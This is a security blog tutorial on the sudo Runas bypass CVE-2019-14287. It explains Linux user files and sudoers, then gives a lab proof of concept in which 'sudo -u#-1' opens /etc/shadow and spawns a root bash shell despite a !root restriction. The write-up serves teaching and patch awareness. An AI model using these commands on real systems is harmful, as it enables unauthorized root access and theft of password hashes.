SUDO Security Bypass Vulnerability – CVE-2019-14287

Vulnerability Details:

Brief description of vulnerability

The security policy bypass vulnerability that allows users on a Linux system to execute commands as root, while the user permissions in the sudoers file explicitly prevents these commands from being run as root.

It can be executed by a user that has ALL permissions in the Runas specification. Which means they can execute commands as any or all users on the system.

This consequently allows users to run commands and tools as root by specifying the user id (UID) as -1 or the unsigned equivalent of -1: 4294967295

sudo -u#-1 /usr/bin/id or the unsigned equivalent of -1 sudo -u#4294967295 /usr/bin/id

Explanation of exploit

What is sudo?

sudo is a command that allows you to run scripts or programs that require administrative privileges. It stands for super user do.

You can also use the su (switch user) command to switch the superuser.

How to check sudo version installed?

sudo –version or sudo –version | grep version

How user information is stored in Linux

Each user account has a username, unique identifier (UID), group(GID), home directory, and the default shell to be used when the user logs in to the system.

All user account related information is stored in the passwd file, located in /etc/passwd

Passwords in the passwd file are encrypted and are therefore represented by an x.

The encrypted passwords for accounts are stored in the shadow file, located in /etc/shadow. The shadow file can only be accessed by the root user.

Structure of user account

username:password:UID:GID:comments:home_directory:shell

The first user in the passwd file is the root account

The root account always has a UID of 0

System accounts have a UID of less than 1000 while user accounts have UID >= 1000

The sudoers file

The sudoers file contains all the permissions for users and groups on a Linux system. it is found in /etc/sudoers

The sudoers file can be accessed and modified securely by using visudo.

visudo is a tool that allows you to access and make changes to the sudoers file securely, it does this by ensuring that only one user is editing the sudoers file and by checking for logical errors.

We will use visudo to demonstrate the exploit.

POC

This will depend on user permissions in regards to commands specified within the sudoers file.

Requirements:

  • The user requires sudo privileges that allow running of commands with user ID’s – We will be setting this up in the sudoers file
  • sudo version <= 1.8.28

1) Create user on system.

2) Modify the sudoers file with visudo.

3) Provide the user with sudo privileges and specify the commands that can be run.

alexis ALL=(ALL, !root) /usr/bin/vi

4) You can also specify a command alias.

Cmnd_Alias VIM = /usr/bin/vi

5) After setting up permissions, log in as user alexis and run command:

sudo -u#-1 vi /etc/shadow

6) To confirm this try running it without specifying the UID.

sudo vi /etc/shadow

This confirms that the UID -1 bypasses the permissions and allows for command execution.

You can also confirm this by using the id command.

7) If a user can run any command then we can get a bash shell as root user

alexis ALL=(ALL, !root) ALL

sudo -u#-1 bash

 

 

Liked it? Take a second to support Alexis on Patreon!
Share this post

Leave a Reply

Your email address will not be published. Required fields are marked *

Releated

SSH Brute-force Protection With Fail2Ban

Fail2Ban is an intrusion prevention framework written in Python that protects Linux systems and servers from brute-force attacks. We can setup Fail2Ban to provide brute-force protection for SSH on our server, this will ensure that the server is secure from brute-force attacks and it also allows us to monitor the strength of the brute-force attacks […]

Share this post

Linux Essentials: Curl Fundamentals

What is Curl? Curl is a utility that allows you to transfer data to or from a network server, using one of the supported protocols (HTTP, HTTPS, FTP, FTPS, SCP, SFTP, TFTP, DICT, TELNET, LDAP or FILE).   It is a multi-platform tool.   Syntax Curl <parameters/options> <URL>   Installation Linux – sudo apt-get install […]

Share this post